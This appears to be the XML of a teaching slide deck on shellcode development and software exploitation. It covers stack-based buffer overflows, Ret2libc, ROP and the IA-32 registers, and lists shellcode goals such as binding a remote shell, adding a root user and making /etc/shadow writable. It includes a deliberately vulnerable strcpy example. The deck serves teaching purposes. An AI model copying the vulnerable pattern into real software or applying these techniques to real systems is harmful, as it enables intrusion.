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283" r:id="rId56"/>
    <p:sldId id="311" r:id="rId57"/>
    <p:sldId id="312" r:id="rId58"/>
    <p:sldId id="313" r:id="rId59"/>
    <p:sldId id="314" r:id="rId60"/>
    <p:sldId id="317" r:id="rId61"/>
    <p:sldId id="318" r:id="rId62"/>
    <p:sldId id="319" r:id="rId63"/>
    <p:sldId id="315" r:id="rId64"/>
    <p:sldId id="316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8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2FD45-1E7D-4314-8F3E-B76613B24F5C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F0302-0F2A-4E07-B739-05F93FA09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158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fld id="{479BC999-E86E-4F24-A72E-909E0C75000C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fld id="{DD9A4CC4-BDE6-4FD7-87AD-1BEC2D92FFB2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fld id="{1C9CF093-4E69-4919-BA53-5DE578A46867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fld id="{718EC258-33F7-4ABD-9283-A058C41C30A6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itchFamily="18" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{E64C8666-FABA-43FF-8B8F-9D17E829A6D8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As Shellcode interrupts the normal flow of a process, it is important to understand how the instructions of a program are executed, how the process makes use of registers and memory and also how function calls are handled using a call stack.  The stack is a memory area allocated by the operating system, it essentially used to hold the execution states of process, and a level of the stack represents an execution text of variables in that state and the return address to a memory area where the next instruction exists </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Text Area = Read only memory and program code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Initialized area contains local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>And then their the stack.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.   The following diagram shows the stack right before the epilog portion of function A which is not shown in the assembly code above.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The EAX register contains a descriptor for the system call.  Refer to “Designing Shell Code Demystified [8] for details about accessing system calls in an assembly.  Depending on the value in the EAX register, other registers will be used accordingly.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8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2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6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8CDD45A-DAA3-4BF6-B9CD-AABA8C1E9419}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>11/14/2018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8F6C569B-95FF-4663-941B-5AE0072E24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47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26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7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2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7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6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5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5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B328-56AE-4088-832B-6251ED561667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9405-776B-4521-A3C5-C12169E7E2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4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4800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>漏洞的利用和发现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1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204864"/>
            <a:ext cx="6400800" cy="343393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zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a: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  <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开发</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="36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  <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞利用平台及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>框架</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean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en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞挖掘技术及工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="36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5568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b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>改进技术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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Ret2lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>/ Ret2libc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>系统库中的特定函数（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>）地址覆盖返回地址。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en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>ROP(Return Oriented Programming) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>向指定内存写入任意立即数，拼接内存中的返回指令。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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67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736725"/>
            <a:ext cx="7772400" cy="1920875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="720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Shellcode Development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303463" y="3983038"/>
            <a:ext cx="5451475" cy="159385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-Femi Oloyede	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-Pallavi Murudkar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82759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Agenda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Introduction</a:t>
            </a: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What can Shellcode do?</a:t>
            </a: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Tools for Shellcode Development</a:t>
            </a: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Understanding Shellcode</a:t>
            </a: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Developing Shellcode</a:t>
            </a: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Methods of Detecting Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:p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55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Shellcode is defined as a set of instructions injected and then executed by an exploited program</a:t>
            </a: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Shellcodes are primarily used to exploit buffer overflows</a:t>
            </a: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The most important task when creating shellcode is to make it small and executable</a:t>
            </a:r>
          </a:p>
          <a:p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31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What can Shellcode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Providing access to the attacked system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Spawning /bin/sh [or] cmd.exe (local shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Binding a shell to a port (remote shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Adding root/admin user to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Chmod()’ing /etc/shadow to be writeable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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0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Tools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for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Shellcode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412776"/>
            <a:ext cx="8686800" cy="5262979"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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Nasm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Used to write assembly code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Gdb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GNU debugger to analyze core dump files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Objdump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To disassemble file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Ktrace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Trace all system calls a process is using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7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Next ( Femi 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Understanding Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p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Developing Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p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Methods of Detecting Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161342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Understanding Shellcode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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>IA-32 Machine Architecture (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>instruction set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> registers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Program Flow dynamics - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Processes Memory Organization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>context switching during function-calls and interrupt processing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> is injected via the modification of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>the return address of a function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>by way of a stack-based buffer overflow.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19645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Machine Architecture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1844824"/>
            <a:ext cx="7772400" cy="15938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500" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Refer to IA-32 Intel® Architecture Software Developer's  Manual Volume 1: Basic Architecture”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="1500" dirty="0"/>
              <a:t>A large amount of computer software supports the platform, including operating systems such as MS-DOS, Windows, Linux, BSD, Solaris, and Mac OS X.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr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500" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="28746" name="Group 7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44591263"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1043608" y="3140968"/>
          <a:ext cx="7467600" cy="2381251"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="698500"/>
                <a:gridCol w="6769100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EBP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Base pointer. Primarily used to hold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the address of the current stack frame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 Also sometimes used as a general data or address register.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ESI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General register or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"source index"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for string operations. Also has a one-byte LODS[size] instruction for loading data from memory to the accumulator.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EDI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General register or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"destination index"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for string operations. Also has a one-byte STOS[size] instruction to write data out of the accumulator.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ESP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Stack pointer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 Is used to hold the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top address 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of the stack.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EIP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Instruction pointer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. Holds the current instruction address.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ea typeface="宋体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1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Program Flow Dynamics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30744" name="Picture 2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438400"/>
            <a:ext cx="2819400" cy="3657600"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln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46" name="Picture 2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2819400"/>
            <a:ext cx="5562600" cy="3062288"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="hlink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74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</a:rPr>
              <a:t>4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>漏洞利用与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>利用过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>利用技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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593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Program Flow Dynamics (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46117" name="Picture 3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828800"/>
            <a:ext cx="7467600" cy="4648200"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="80808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742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Stack Based Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57348" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1828800"/>
            <a:ext cx="7543800" cy="4805363"/>
            <a:chOff x="2520" y="761"/>
            <a:chExt cx="7200" cy="5092"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57349" name="AutoShape 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2520" y="761"/>
              <a:ext cx="7200" cy="5092"/>
            </a:xfrm>
            <a:prstGeom prst="rect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2670" y="915"/>
              <a:ext cx="4500" cy="27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200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>void </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>(char  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>charPtr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t> *</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>str</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>char</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t> buffer[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>];</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" err="1">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>strcpy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>buffer,str</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>void </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>main</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>() </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>  char </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>BigggerString</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>12</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:ea typeface="宋体" charset="-122"/>
                </a:rPr>
                <a:t>] = “AAAAAAAAAAAA”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
